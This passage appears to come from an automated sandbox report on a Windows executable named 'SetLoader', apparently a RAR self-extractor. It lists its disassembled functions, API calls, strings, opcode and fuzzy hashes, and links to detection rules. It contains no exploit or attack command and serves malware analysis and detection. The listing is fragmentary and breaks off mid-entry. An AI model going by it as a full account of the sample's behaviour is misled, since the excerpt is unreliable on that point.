                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,0061CEA9,?,00000000,00000000,?,?,0061CD87,?,00000004,0061CEA9), ref: 00632464
                                              • SysAllocString.OLEAUT32(00000000), ref: 0063246F
                                              • _com_issue_error.COMSUPP ref: 00632498
                                              • _com_issue_error.COMSUPP ref: 006324A2
                                              • GetLastError.KERNEL32(80070057,5CB4B331,00000001,00000000,00000000,?,0061CD87,?,00000004,0061CEA9,ROOT\CIMV2), ref: 006324A7
                                              • _com_issue_error.COMSUPP ref: 006324BA
                                              • GetLastError.KERNEL32(00000000,?,0061CD87,?,00000004,0061CEA9,ROOT\CIMV2), ref: 006324D0
                                              • _com_issue_error.COMSUPP ref: 006324E3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                              • String ID:
                                              • API String ID: 1353541977-0
                                              • Opcode ID: c8ef701a04042d5efcfafb02b1bef4b438b96acd466f1985f78167d54e766a90
                                              • Instruction ID: a35b30f8182b61cc8a0aaef0340ab34e4282ce706332fe244e1a138097b659e4
                                              • Opcode Fuzzy Hash: c8ef701a04042d5efcfafb02b1bef4b438b96acd466f1985f78167d54e766a90
                                              • Instruction Fuzzy Hash: 0141F6B1A00316ABDB10DF68DC55BEEBBEAEB49710F10822DF505E7391DB35990087E9
                                              Function 0063C06A Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 305COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: __alldvrm$_strrchr
                                              • String ID: =zc$=zc$=zc
                                              • API String ID: 1036877536-3470228471
                                              • Opcode ID: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
                                              • Instruction ID: d7e2a85226591d07fe5d35e5c93f0e7c66342c712a39ac589a8dba35fe547e40
                                              • Opcode Fuzzy Hash: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
                                              • Instruction Fuzzy Hash: BFA147729007869FEB25CF68C8917EEBBE6EF52360F18416DF485AB342C6358941C7D4
                                              Function 00634F20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                              Download Yara Rule
                                              APIs
                                              • _ValidateLocalCookies.LIBCMT ref: 00634F57
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00634F5F
                                              • _ValidateLocalCookies.LIBCMT ref: 00634FE8
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00635013
                                              • _ValidateLocalCookies.LIBCMT ref: 00635068
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                              • String ID: Mc$csm
                                              • API String ID: 1170836740-1810962383
                                              • Opcode ID: 7957533d700eb1d36ddd2fd2248b044873c6b19e3fd6bb3b8f597e7fa6be9e6a
                                              • Instruction ID: 56d807497c0b34ce42040592ede5d4be530730987dcc028881ff683ed10d69f4
                                              • Opcode Fuzzy Hash: 7957533d700eb1d36ddd2fd2248b044873c6b19e3fd6bb3b8f597e7fa6be9e6a
                                              • Instruction Fuzzy Hash: FF41A334A00219AFCF10DF68C885A9EBBF6FF45314F188159F8159B352DB31AA45CBD1
                                              Function 0062D8C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00611366: GetDlgItem.USER32(00000000,00003021), ref: 006113AA
                                                • Part of subcall function 00611366: SetWindowTextW.USER32(00000000,006465F4), ref: 006113C0
                                              • SendMessageW.USER32(?,00000080,00000001,004F01B1), ref: 0062D937
                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0062D950
                                              • SetWindowTextW.USER32(?,?), ref: 0062D961
                                              • GetDlgItem.USER32(?,00000065), ref: 0062D96A
                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0062D97E
                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0062D994
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: MessageSend$Item$TextWindow
                                              • String ID: LICENSEDLG
                                              • API String ID: 224466086-2177901306
                                              • Opcode ID: 5f195c51b88962a8e51b8fccef9ce8368a9c54b53ade891212a7920b75f11193
                                              • Instruction ID: 35ed121bfd80a320e4b3f66e388cb2978c874b6c15b6f36427e3ac7e1c8611d3
                                              • Opcode Fuzzy Hash: 5f195c51b88962a8e51b8fccef9ce8368a9c54b53ade891212a7920b75f11193
                                              • Instruction Fuzzy Hash: 20212732604624BBE7155F25FC09FBB3B6FEB46B82F045018F244A22A0CB629981DB71
                                              Function 0062BC7E Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: </p>$</style>$<br>$<style>$>
                                              • API String ID: 176396367-3568243669
                                              • Opcode ID: 8bfa53577f3ac69f715720a26500b06507cd986cdbe7459e36c75b4b5a5a98e1
                                              • Instruction ID: a21527f2616ca73ff39ffd1ec73bb47c4580d7ca2354689072f0613eb4bd845f
                                              • Opcode Fuzzy Hash: 8bfa53577f3ac69f715720a26500b06507cd986cdbe7459e36c75b4b5a5a98e1
                                              • Instruction Fuzzy Hash: 0551F766744B7356DB305A19B8117F663E3DFA0790F692C2AFDC08B3C1FB648C818A65
                                              Function 0061ACE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 149fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0061AD2B
                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0061AD4A
                                                • Part of subcall function 0061E208: _wcslen.LIBCMT ref: 0061E210
                                                • Part of subcall function 00624168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0061E084,00000000,.exe,?,?,00000800,?,?,?,0062AD5D), ref: 0062417E
                                              • _swprintf.LIBCMT ref: 0061ADEC
                                                • Part of subcall function 00614C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00614C13
                                              • MoveFileW.KERNEL32(?,?), ref: 0061AE5E
                                              • MoveFileW.KERNEL32(?,?), ref: 0061AE9E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: FileMoveNamePath$CompareLongShortString__vswprintf_c_l_swprintf_wcslen
                                              • String ID: rtmp%d
                                              • API String ID: 2133196417-3303766350
                                              • Opcode ID: d6dc87a37e7a3887fe79c667eb9c9041bc9442f7d993adc0a86ac4e7f7b09b6d
                                              • Instruction ID: 6b6b24c67efac43d6c5b65385fead623f354407457b2b2248f2dafc2b2583459
                                              • Opcode Fuzzy Hash: d6dc87a37e7a3887fe79c667eb9c9041bc9442f7d993adc0a86ac4e7f7b09b6d
                                              • Instruction Fuzzy Hash: CD51A1719016196ACF20EBA0CC95EEF777EAF05340F0808A9F555E3141EB359AC8EF65
                                              Function 0062BE55 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125COMMON
                                              Download Yara Rule
                                              APIs
                                              • ShowWindow.USER32(?,00000000), ref: 0062BE8A
                                              • GetWindowRect.USER32(?,?), ref: 0062BED1
                                              • ShowWindow.USER32(?,00000005,00000000), ref: 0062BF6C
                                              • SetWindowTextW.USER32(?,00000000), ref: 0062BF74
                                              • ShowWindow.USER32(00000000,00000005), ref: 0062BF8A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Window$Show$RectText
                                              • String ID: RarHtmlClassName
                                              • API String ID: 3937224194-1658105358
                                              • Opcode ID: 6d8384f592f82ed92f62dce61cd638d37076ae12d1fc3068f70d4b054c39134d
                                              • Instruction ID: 5b760f5a1dad0b731b3a80b9f07b085ee2e8cb2ce88f347234fda1393f520c85
                                              • Opcode Fuzzy Hash: 6d8384f592f82ed92f62dce61cd638d37076ae12d1fc3068f70d4b054c39134d
                                              • Instruction Fuzzy Hash: C341F172108710AFCB109F64ED49BAB7BEAEF48340F49951DFD489A252CB30D840CFA6
                                              Function 0062B8D5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                              • API String ID: 176396367-3743748572
                                              • Opcode ID: fb13652bf73d69ba48d03c224008e9729972d504bfe7070fd4ea0a3eb9ba0d95
                                              • Instruction ID: 8491fcf5ad870b30f56ce404fc35462a66f3080aa79e0fd4740816583271a8ad
                                              • Opcode Fuzzy Hash: fb13652bf73d69ba48d03c224008e9729972d504bfe7070fd4ea0a3eb9ba0d95
                                              • Instruction Fuzzy Hash: 5B313A22A44B156AD630EA54BC42BF6B3A6EB51360F60442FFA85573C0FB60ACC587E5
                                              Function 0063EEF4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0063EEB8: _free.LIBCMT ref: 0063EEE1
                                              • _free.LIBCMT ref: 0063EF42
                                                • Part of subcall function 0063BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?), ref: 0063BB10
                                                • Part of subcall function 0063BAFA: GetLastError.KERNEL32(?,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?,?), ref: 0063BB22
                                              • _free.LIBCMT ref: 0063EF4D
                                              • _free.LIBCMT ref: 0063EF58
                                              • _free.LIBCMT ref: 0063EFAC
                                              • _free.LIBCMT ref: 0063EFB7
                                              • _free.LIBCMT ref: 0063EFC2
                                              • _free.LIBCMT ref: 0063EFCD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                              • Instruction ID: 28d261f0af30de5d22e4bb781daa07d0e5c41a7e61380e5a57b2834340b288b8
                                              • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                              • Instruction Fuzzy Hash: 2011FC72944B05AAE6A0F7B1CC06FCB77EEEF04700F404C1DF29A662D2DB76A50547A8
                                              Function 00618C95 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000020,?), ref: 00618CB2
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00618CB9
                                              • GetLastError.KERNEL32 ref: 00618CF6
                                              • CloseHandle.KERNEL32(?), ref: 00618D05
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Process$CloseCurrentErrorHandleLastOpenToken
                                              • String ID: Jc$^c
                                              • API String ID: 2767541406-3363903844
                                              • Opcode ID: 438840e40884e7466c00e9969de871cfe6ba44868f8ebac4cbbdb7f7edb78b86
                                              • Instruction ID: 901084e3693929b10097c6b80d53642c5ae03a13fe6262910f8c0eeb4c039672
                                              • Opcode Fuzzy Hash: 438840e40884e7466c00e9969de871cfe6ba44868f8ebac4cbbdb7f7edb78b86
                                              • Instruction Fuzzy Hash: 8C0144B0901209AFDB109FA4DD89AFF7BBDEF05744F045419B501E3190DA309D84CB71
                                              Function 00630ACB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00630B46,00630AA9,00630D4A), ref: 00630AE2
                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00630AF8
                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00630B0D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AddressProc$HandleModule
                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                              • API String ID: 667068680-1718035505
                                              • Opcode ID: 114b3cd6ae30733301d60a2b2e42763383239be408522eecc9695979003c774e
                                              • Instruction ID: 70709c049011b5cf970ec5233400474be589c766fe19a73a3e647cd6d3657922
                                              • Opcode Fuzzy Hash: 114b3cd6ae30733301d60a2b2e42763383239be408522eecc9695979003c774e
                                              • Instruction Fuzzy Hash: D3F028313513218B3B309FA45DB56AA62CF9E06748B3110B9E507C3340E651CC89C3D1
                                              Function 0062418A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39COMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 00624192
                                              • _wcslen.LIBCMT ref: 006241A3
                                              • _wcslen.LIBCMT ref: 006241B3
                                              • _wcslen.LIBCMT ref: 006241C1
                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0061D2D3,?,?,00000000,?,?,?), ref: 006241DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen$CompareString
                                              • String ID: <
                                              • API String ID: 3397213944-4251816714
                                              • Opcode ID: 8fa529d9ad4e1da6e68c328f89dfaa8928a6f8c67ce963d2505e4afa6cf03880
                                              • Instruction ID: 2febf933f18cf5a0f942bdbe21e868907c751e75fbc47b6fe0ac5b4da3b8570c
                                              • Opcode Fuzzy Hash: 8fa529d9ad4e1da6e68c328f89dfaa8928a6f8c67ce963d2505e4afa6cf03880
                                              • Instruction Fuzzy Hash: 40F06732008068BFCF122F50EC09C8A3F67EF51B70F25C019F6195A0A2CE3299A29AD4
                                              Function 0063B160 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 0063B17E
                                                • Part of subcall function 0063BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?), ref: 0063BB10
                                                • Part of subcall function 0063BAFA: GetLastError.KERNEL32(?,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?,?), ref: 0063BB22
                                              • _free.LIBCMT ref: 0063B190
                                              • _free.LIBCMT ref: 0063B1A3
                                              • _free.LIBCMT ref: 0063B1B4
                                              • _free.LIBCMT ref: 0063B1C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID: p,e
                                              • API String ID: 776569668-2941865787
                                              • Opcode ID: 5c10e6b979beaa344f8d0ceb7ab050ef4eb620e3503658146ff6b681c7fbd2fd
                                              • Instruction ID: f43220004febc9f05569eb0cd490f23ddae2de66913d08936ec7f5b3b2d7e7d2
                                              • Opcode Fuzzy Hash: 5c10e6b979beaa344f8d0ceb7ab050ef4eb620e3503658146ff6b681c7fbd2fd
                                              • Instruction Fuzzy Hash: 24F0B770810A219BCB8AEF15EC124883BA7F715B25B05720AF62E96272CB7749918FD4
                                              Function 0063511A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00635111,00634ECC,006321B4), ref: 00635128
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00635136
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0063514F
                                              • SetLastError.KERNEL32(00000000,00635111,00634ECC,006321B4), ref: 006351A1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: 0aa9fc7438669200ded9a05410e305dd0d8b8ba4c3280b9a5c8b905434613fd4
